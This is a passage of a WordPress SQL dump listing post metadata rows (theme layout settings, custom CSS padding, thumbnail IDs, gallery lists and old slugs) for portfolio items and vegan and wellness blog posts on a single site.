1456'),(5794,3216,'qodef_portfolio_single_template_meta','gallery'),(5795,3216,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(5796,3216,'qodef_portfolio_masonry_original_dimensions_meta','default'),(5797,3216,'portfolio_single_back_to_link','1730'),(5798,3216,'qodef_disable_vertical_header_background_image_meta','no'),(5799,3216,'qodef_disable_header_widget_logo_area_meta','no'),(5800,3216,'qodef_disable_header_widget_menu_area_meta','no'),(5801,3216,'slide_template','default'),(5802,3216,'_wpb_vc_js_status','true'),(5803,3216,'qodef_title_area_type_meta','breadcrumbs'),(5804,3216,'qodef_page_content_top_padding','76'),(5805,3216,'qodef_page_content_top_padding_mobile','yes'),(5806,3216,'qodef_title_area_height_meta','140'),(5807,3216,'qodef_title_area_title_tag_meta','h2'),(5808,3216,'_wp_old_slug','full-width-images'),(5809,3216,'_wp_old_slug','full-width-images-2'),(5810,3216,'_wp_old_slug','images'),(5811,3216,'_wp_old_slug','big-images'),(5812,3216,'_wp_old_slug','small-images'),(5813,3216,'_wp_old_slug','slider'),(5814,3216,'_wp_old_slug','big-slider'),(5815,3216,'_wp_old_slug','big-slider-2'),(5816,3216,'_wp_old_slug','small-slider'),(5817,3216,'_wp_old_slug','small-slider-2'),(5818,3216,'_wp_old_slug','big-gallery'),(5819,3216,'_dp_original','1444'),(5820,3216,'_wp_old_slug','forgiveness-2'),(5821,3216,'_thumbnail_id','4048'),(5822,3217,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5823,3217,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5824,3217,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5825,3217,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5826,3217,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5827,3217,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5828,3217,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5829,3217,'qodef_page_content_behind_header_meta','no'),(5830,3217,'qodef_boxed_background_image_attachment_meta','fixed'),(5831,3217,'qodef-portfolio-image-gallery','1435,1434,1445,1458,1457,1456'),(5832,3217,'qodef_portfolio_single_template_meta','gallery'),(5833,3217,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(5834,3217,'qodef_portfolio_masonry_original_dimensions_meta','default'),(5835,3217,'portfolio_single_back_to_link','1730'),(5836,3217,'qodef_disable_vertical_header_background_image_meta','no'),(5837,3217,'qodef_disable_header_widget_logo_area_meta','no'),(5838,3217,'qodef_disable_header_widget_menu_area_meta','no'),(5839,3217,'slide_template','default'),(5840,3217,'_wpb_vc_js_status','true'),(5841,3217,'qodef_title_area_type_meta','breadcrumbs'),(5842,3217,'qodef_page_content_top_padding','76'),(5843,3217,'qodef_page_content_top_padding_mobile','yes'),(5844,3217,'qodef_title_area_height_meta','140'),(5845,3217,'qodef_title_area_title_tag_meta','h2'),(5846,3217,'_wp_old_slug','full-width-images'),(5847,3217,'_wp_old_slug','full-width-images-2'),(5848,3217,'_wp_old_slug','images'),(5849,3217,'_wp_old_slug','big-images'),(5850,3217,'_wp_old_slug','small-images'),(5851,3217,'_wp_old_slug','slider'),(5852,3217,'_wp_old_slug','big-slider'),(5853,3217,'_wp_old_slug','big-slider-2'),(5854,3217,'_wp_old_slug','small-slider'),(5855,3217,'_wp_old_slug','small-slider-2'),(5856,3217,'_wp_old_slug','big-gallery'),(5857,3217,'_thumbnail_id','713'),(5858,3217,'_dp_original','1444'),(5859,3217,'_wp_old_slug','forgiveness-3'),(5860,3218,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5861,3218,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5862,3218,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5863,3218,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5864,3218,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5865,3218,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5866,3218,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5867,3218,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5868,3218,'qodef_page_content_behind_header_meta','no'),(5869,3218,'qodef_boxed_background_image_attachment_meta','fixed'),(5870,3218,'qodef-portfolio-image-gallery','1435,1434,1445,1458,1457,1456'),(5871,3218,'qodef_portfolio_single_template_meta','small-gallery'),(5872,3218,'qodef_portfolio_masonry_fixed_dimensions_meta','default'),(5873,3218,'qodef_portfolio_masonry_original_dimensions_meta','default'),(5874,3218,'portfolio_single_back_to_link','1730'),(5875,3218,'qodef_disable_vertical_header_background_image_meta','no'),(5876,3218,'qodef_disable_header_widget_logo_area_meta','no'),(5877,3218,'qodef_disable_header_widget_menu_area_meta','no'),(5878,3218,'slide_template','default'),(5879,3218,'_wpb_vc_js_status','true'),(5880,3218,'qodef_title_area_type_meta','breadcrumbs'),(5881,3218,'qodef_page_content_top_padding','76'),(5882,3218,'qodef_page_content_top_padding_mobile','yes'),(5883,3218,'qodef_title_area_height_meta','140'),(5884,3218,'qodef_title_area_title_tag_meta','h2'),(5885,3218,'_wp_old_slug','full-width-images'),(5886,3218,'_wp_old_slug','full-width-images-2'),(5887,3218,'_wp_old_slug','images'),(5888,3218,'_wp_old_slug','big-images'),(5889,3218,'_wp_old_slug','small-images'),(5890,3218,'_wp_old_slug','slider'),(5891,3218,'_wp_old_slug','big-slider'),(5892,3218,'_wp_old_slug','big-slider-2'),(5893,3218,'_wp_old_slug','small-slider'),(5894,3218,'_wp_old_slug','small-slider-2'),(5895,3218,'_wp_old_slug','small-gallery'),(5896,3218,'qodef_portfolio_single_gallery_columns_number_meta','two'),(5897,3218,'_thumbnail_id','2760'),(5898,3218,'_dp_original','1459'),(5899,3218,'_wp_old_slug','organic-2'),(5902,996,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(5903,996,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5904,996,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(5905,996,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5906,996,'_thumbnail_id','999'),(5907,996,'slide_template','default'),(5908,996,'_wpb_vc_js_status','true'),(5909,996,'qodef_page_content_behind_header_meta','no'),(5910,996,'qodef_boxed_background_image_attachment_meta','fixed'),(5911,996,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(5912,996,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(5913,996,'qodef_video_type_meta','social_networks'),(5914,996,'qodef_audio_type_meta','social_networks'),(5915,996,'qodef_post_skin','qodef-post-light-skin'),(5916,996,'qodef_disable_vertical_header_background_image_meta','no'),(5917,996,'qodef_disable_header_widget_logo_area_meta','no'),(5918,996,'qodef_disable_header_widget_menu_area_meta','no'),(5919,996,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(5920,996,'qodef_title_area_height_meta','140'),(5921,996,'qodef_title_area_background_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-title-area-1.jpg'),(5922,996,'qodef_title_area_title_tag_meta','h2'),(5923,996,'qodef_title_text_color_meta','#3c3c3c'),(5924,996,'qodef_title_area_background_image_behavior_meta','parallax'),(5925,996,'qodef_blog_single_sidebar_layout_meta','sidebar-33-right'),(5926,996,'_dp_original','668'),(5927,996,'_wp_old_slug','even-cows-dont-drink-milk-so-why-would-you'),(5928,996,'_wp_old_slug','even-cows-dont-drink-milk-so-why-would-you-2'),(5929,996,'qodef_page_content_top_padding','40'),(5930,996,'_wp_old_slug','take-bubble-bath-everyday-for-perfect-end-of-day'),(5931,996,'_wp_old_slug','take-perfect-bubble-bath-everyday'),(5932,996,'qodef_page_content_top_padding_mobile','yes'),(5935,1002,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(5936,1002,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5937,1002,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(5938,1002,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5939,1002,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5940,1002,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(5941,1002,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(5942,1002,'_thumbnail_id','1004'),(5943,1002,'slide_template','default'),(5944,1002,'_wpb_vc_js_status','true'),(5945,1002,'qodef_page_content_behind_header_meta','no'),(5946,1002,'qodef_boxed_background_image_attachment_meta','fixed'),(5947,1002,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(5948,1002,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(5949,1002,'qodef_video_type_meta','social_networks'),(5950,1002,'qodef_audio_type_meta','social_networks'),(5951,1002,'qodef_post_skin','qodef-post-light-skin'),(5952,1002,'qodef_disable_vertical_header_background_image_meta','no'),(5953,1002,'qodef_disable_header_widget_logo_area_meta','no'),(5954,1002,'qodef_disable_header_widget_menu_area_meta','no'),(5955,1002,'qodef_title_area_height_meta','140'),(5956,1002,'qodef_title_area_background_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-title-area-1.jpg'),(5957,1002,'qodef_title_area_title_tag_meta','h2'),(5958,1002,'qodef_title_text_color_meta','#3c3c3c'),(5959,1002,'qodef_title_area_background_image_behavior_meta','parallax'),(5960,1002,'qodef_blog_single_sidebar_layout_meta','sidebar-33-right'),(5961,1002,'_wp_old_slug','even-cows-dont-drink-milk-so-why-would-you'),(5962,1002,'_wp_old_slug','even-cows-dont-drink-milk-so-why-would-you-2'),(5963,1002,'_dp_original','996'),(5964,1002,'_wp_old_slug','take-bubble-bath-everyday-for-perfect-end-of-day'),(5965,1002,'qodef_page_content_top_padding','40'),(5966,1002,'qodef_page_content_top_padding_mobile','yes'),(5969,1006,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(5970,1006,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5971,1006,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(5972,1006,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5973,1006,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5974,1006,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(5975,1006,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(5976,1006,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(5977,1006,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(5978,1006,'_thumbnail_id','1003'),(5979,1006,'slide_template','default'),(5980,1006,'_wpb_vc_js_status','true'),(5981,1006,'qodef_page_content_behind_header_meta','no'),(5982,1006,'qodef_boxed_background_image_attachment_meta','fixed'),(5983,1006,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(5984,1006,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(5985,1006,'qodef_video_type_meta','social_networks'),(5986,1006,'qodef_audio_type_meta','social_networks'),(5987,1006,'qodef_post_skin','qodef-post-light-skin'),(5988,1006,'qodef_disable_vertical_header_background_image_meta','no'),(5989,1006,'qodef_disable_header_widget_logo_area_meta','no'),(5990,1006,'qodef_disable_header_widget_menu_area_meta','no'),(5991,1006,'qodef_title_area_height_meta','140'),(5992,1006,'qodef_title_area_background_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-title-area-1.jpg'),(5993,1006,'qodef_title_area_title_tag_meta','h2'),(5994,1006,'qodef_title_text_color_meta','#3c3c3c'),(5995,1006,'qodef_title_area_background_image_behavior_meta','parallax'),(5996,1006,'qodef_blog_single_sidebar_layout_meta','sidebar-33-right'),(5997,1006,'_wp_old_slug','even-cows-dont-drink-milk-so-why-would-you'),(5998,1006,'_wp_old_slug','even-cows-dont-drink-milk-so-why-would-you-2'),(5999,1006,'_wp_old_slug','take-bubble-bath-everyday-for-perfect-end-of-day'),(6000,1006,'_dp_original','1002'),(6001,1006,'_wp_old_slug','find-herbal-tea-for-every-skin-complexion'),(6002,1006,'qodef_page_content_top_padding','40'),(6003,1006,'_wp_old_slug','homemade-oragnic-soaps-are-new-vegan-addiction'),(6004,1006,'_wp_old_slug','homemade-oragnic-soaps-for-new-vegans'),(6005,1006,'qodef_page_content_top_padding_mobile','yes'),(6008,1011,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6009,1011,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6010,1011,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6011,1011,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6012,1011,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6013,1011,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6014,1011,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6015,1011,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6016,1011,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6017,1011,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6018,1011,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6019,1011,'_thumbnail_id','1013'),(6020,1011,'slide_template','default'),(6021,1011,'_wpb_vc_js_status','true'),(6022,1011,'qodef_page_content_behind_header_meta','no'),(6023,1011,'qodef_boxed_background_image_attachment_meta','fixed'),(6024,1011,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(6025,1011,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(6026,1011,'qodef_video_type_meta','social_networks'),(6027,1011,'qodef_audio_type_meta','social_networks'),(6028,1011,'qodef_post_skin','qodef-post-light-skin'),(6029,1011,'qodef_disable_vertical_header_background_image_meta','no'),(6030,1011,'qodef_disable_header_widget_logo_area_meta','no'),(6031,1011,'qodef_disable_header_widget_menu_area_meta','no'),(6032,1011,'qodef_title_area_height_meta','140'),(6033,1011,'qodef_title_area_background_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-title-area-1.jpg'),(6034,1011,'qodef_title_area_title_tag_meta','h2'),(6035,1011,'qodef_title_text_color_meta','#3c3c3c'),(6036,1011,'qodef_title_area_background_image_behavior_meta','parallax'),(6037,1011,'qodef_blog_single_sidebar_layout_meta','sidebar-33-right'),(6038,1011,'_wp_old_slug','even-cows-dont-drink-milk-so-why-would-you'),(6039,1011,'_wp_old_slug','even-cows-dont-drink-milk-so-why-would-you-2'),(6040,1011,'_wp_old_slug','take-bubble-bath-everyday-for-perfect-end-of-day'),(6041,1011,'_wp_old_slug','find-herbal-tea-for-every-skin-complexion'),(6042,1011,'_dp_original','1006'),(6043,1011,'_wp_old_slug','homemade-oragnic-soaps-are-new-vegan-addiction'),(6044,1011,'_wp_old_slug','homemade-oragnic-soaps-are-new-vegan-addiction-2'),(6045,1011,'qodef_page_content_top_padding','40'),(6046,1011,'qodef_page_content_top_padding_mobile','yes'),(6049,1015,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6050,1015,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6051,1015,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6052,1015,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6053,1015,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6054,1015,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6055,1015,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6056,1015,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6057,1015,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6058,1015,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6059,1015,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6060,1015,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6061,1015,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6062,1015,'_thumbnail_id','1016'),(6063,1015,'slide_template','default'),(6064,1015,'_wpb_vc_js_status','true'),(6065,1015,'qodef_page_content_behind_header_meta','no'),(6066,1015,'qodef_boxed_background_image_attachment_meta','fixed'),(6067,1015,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(6068,1015,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(6069,1015,'qodef_video_type_meta','social_networks'),(6070,1015,'qodef_audio_type_meta','social_networks'),(6071,1015,'qodef_post_skin','qodef-post-light-skin'),(6072,1015,'qodef_disable_vertical_header_background_image_meta','no'),(6073,1015,'qodef_disable_header_widget_logo_area_meta','no'),(6074,1015,'qodef_disable_header_widget_menu_area_meta','no'),(6075,1015,'qodef_title_area_height_meta','140'),(6076,1015,'qodef_title_area_background_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-title-area-1.jpg'),(6077,1015,'qodef_title_area_title_tag_meta','h2'),(6078,1015,'qodef_title_text_color_meta','#3c3c3c'),(6079,1015,'qodef_title_area_background_image_behavior_meta','parallax'),(6080,1015,'qodef_blog_single_sidebar_layout_meta','sidebar-33-right'),(6081,1015,'_wp_old_slug','even-cows-dont-drink-milk-so-why-would-you'),(6082,1015,'_wp_old_slug','even-cows-dont-drink-milk-so-why-would-you-2'),(6083,1015,'_wp_old_slug','take-bubble-bath-everyday-for-perfect-end-of-day'),(6084,1015,'_wp_old_slug','find-herbal-tea-for-every-skin-complexion'),(6085,1015,'_wp_old_slug','homemade-oragnic-soaps-are-new-vegan-addiction'),(6086,1015,'_wp_old_slug','homemade-oragnic-soaps-are-new-vegan-addiction-2'),(6087,1015,'_dp_original','1011'),(6088,1015,'_wp_old_slug','keep-your-body-mind-and-soul-in-ideal-balance'),(6089,1015,'qodef_page_content_top_padding','40'),(6090,1015,'qodef_page_content_top_padding_mobile','yes'),(6093,1019,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6094,1019,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6095,1019,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6096,1019,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6097,1019,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6098,1019,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6099,1019,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6100,1019,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6101,1019,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6102,1019,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6103,1019,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6104,1019,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6105,1019,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6106,1019,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6107,1019,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6108,1019,'_thumbnail_id','1020'),(6109,1019,'slide_template','default'),(6110,1019,'_wpb_vc_js_status','true'),(6111,1019,'qodef_page_content_behind_header_meta','no'),(6112,1019,'qodef_boxed_background_image_attachment_meta','fixed'),(6113,1019,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(6114,1019,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(6115,1019,'qodef_video_type_meta','social_networks'),(6116,1019,'qodef_audio_type_meta','social_networks'),(6117,1019,'qodef_post_skin','qodef-post-light-skin'),(6118,1019,'qodef_disable_vertical_header_background_image_meta','no'),(6119,1019,'qodef_disable_header_widget_logo_area_meta','no'),(6120,1019,'qodef_disable_header_widget_menu_area_meta','no'),(6121,1019,'qodef_title_area_height_meta','140'),(6122,1019,'qodef_title_area_background_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-title-area-1.jpg'),(6123,1019,'qodef_title_area_title_tag_meta','h2'),(6124,1019,'qodef_title_text_color_meta','#3c3c3c'),(6125,1019,'qodef_title_area_background_image_behavior_meta','parallax'),(6126,1019,'qodef_blog_single_sidebar_layout_meta','sidebar-33-right'),(6127,1019,'_wp_old_slug','even-cows-dont-drink-milk-so-why-would-you'),(6128,1019,'_wp_old_slug','even-cows-dont-drink-milk-so-why-would-you-2'),(6129,1019,'_wp_old_slug','take-bubble-bath-everyday-for-perfect-end-of-day'),(6130,1019,'_wp_old_slug','find-herbal-tea-for-every-skin-complexion'),(6131,1019,'_wp_old_slug','homemade-oragnic-soaps-are-new-vegan-addiction'),(6132,1019,'_wp_old_slug','homemade-oragnic-soaps-are-new-vegan-addiction-2'),(6133,1019,'_wp_old_slug','keep-your-body-mind-and-soul-in-ideal-balance'),(6134,1019,'_dp_original','1015'),(6135,1019,'_wp_old_slug','yoga-classes-are-the-best-for-workout-beginners'),(6136,1019,'qodef_page_content_top_padding','40'),(6137,1019,'qodef_page_content_top_padding_mobile','yes'),(6140,1030,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6141,1030,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6142,1030,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6143,1030,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6144,1030,'_thumbnail_id','670'),(6145,1030,'slide_template','default'),(6146,1030,'_wpb_vc_js_status','true'),(6147,1030,'qodef_page_content_behind_header_meta','no'),(6148,1030,'qodef_boxed_background_image_attachment_meta','fixed'),(6149,1030,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(6150,1030,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(6151,1030,'qodef_video_type_meta','social_networks'),(6152,1030,'qodef_audio_type_meta','social_networks'),(6153,1030,'qodef_post_skin','qodef-post-light-skin'),(6154,1030,'qodef_disable_vertical_header_background_image_meta','no'),(6155,1030,'qodef_disable_header_widget_logo_area_meta','no'),(6156,1030,'qodef_disable_header_widget_menu_area_meta','no'),(6157,1030,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6158,1030,'qodef_title_area_height_meta','140'),(6159,1030,'qodef_title_area_background_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-title-area-1.jpg'),(6160,1030,'qodef_title_area_title_tag_meta','h2'),(6161,1030,'qodef_title_text_color_meta','#3c3c3c'),(6162,1030,'qodef_title_area_background_image_behavior_meta','parallax'),(6163,1030,'qodef_blog_single_sidebar_layout_meta','sidebar-33-right'),(6164,1030,'_dp_original','668'),(6165,1030,'_wp_old_slug','even-cows-dont-drink-milk-so-why-would-you'),(6166,1030,'qodef_page_content_top_padding','40'),(6167,1030,'_wp_old_slug','vegan-bowls-are-antioxidant-morning-bombs'),(6168,1030,'qodef_page_content_top_padding_mobile','yes'),(6171,1033,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6172,1033,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6173,1033,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6174,1033,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6175,1033,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6176,1033,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6177,1033,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6178,1033,'_thumbnail_id','724'),(6179,1033,'slide_template','default'),(6180,1033,'_wpb_vc_js_status','true'),(6181,1033,'qodef_page_content_behind_header_meta','no'),(6182,1033,'qodef_boxed_background_image_attachment_meta','fixed'),(6183,1033,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(6184,1033,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(6185,1033,'qodef_video_type_meta','social_networks'),(6186,1033,'qodef_audio_type_meta','social_networks'),(6187,1033,'qodef_post_skin','qodef-post-light-skin'),(6188,1033,'qodef_disable_vertical_header_background_image_meta','no'),(6189,1033,'qodef_disable_header_widget_logo_area_meta','no'),(6190,1033,'qodef_disable_header_widget_menu_area_meta','no'),(6191,1033,'qodef_title_area_height_meta','140'),(6192,1033,'qodef_title_area_background_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-title-area-1.jpg'),(6193,1033,'qodef_title_area_title_tag_meta','h2'),(6194,1033,'qodef_title_text_color_meta','#3c3c3c'),(6195,1033,'qodef_title_area_background_image_behavior_meta','parallax'),(6196,1033,'qodef_blog_single_sidebar_layout_meta','sidebar-33-right'),(6197,1033,'_wp_old_slug','even-cows-dont-drink-milk-so-why-would-you'),(6198,1033,'_wp_old_slug','even-cows-dont-drink-milk-so-why-would-you-2'),(6199,1033,'_dp_original','722'),(6200,1033,'_wp_old_slug','fast-smoothie-recepies'),(6201,1033,'_wp_old_slug','fast-smoothie-recepies-2'),(6202,1033,'qodef_page_content_top_padding','40'),(6203,1033,'qodef_page_content_top_padding_mobile','yes'),(6206,1037,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6207,1037,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6208,1037,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6209,1037,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6210,1037,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6211,1037,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6212,1037,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(6213,1037,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6214,1037,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6215,1037,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6216,1037,'_wpb_shortcodes_custom_css','.vc_custom_1516794149098{padding-top: 3px !important;padding-bottom: 11px !important;}'),(6217,1037,'_thumbnail_id','2115'),(6218,1037,'slide_template','default'),(6219,1037,'_wpb_vc_js_status','true'),(6220,1037,'qodef_page_content_behind_header_meta','no'),(6221,1037,'qodef_boxed_background_image_attachment_meta','fixed'),(6222,1037,'qodef_blog_masonry_gallery_fixed_dimensions_meta','default'),(6223,1037,'qodef_blog_masonry_gallery_original_dimensions_meta','default'),(6224,1037,'qodef_video_type_meta','social_networks'),(6225,1037,'qodef_audio_type_meta','social_networks'),(6226,1037,'qodef_post_skin','qodef-post-light-skin'),(6227,1037,'qodef_disable_vertical_header_background_image_meta','no'),(6228,1037,'qodef_disable_header_widget_logo_area_meta','no'),(6229,1037,'qodef_disable_header_widget_menu_area_meta','no'),(6230,1037,'qodef_title_area_height_meta','140'),(6231,1037,'qodef_title_area_background_image_meta','http://tummyrevolution.com/wp-content/uploads/2018/01/blog-title-area-1.jpg'),(6232,1037,'qodef_title_area_title_tag_meta','h2'),(623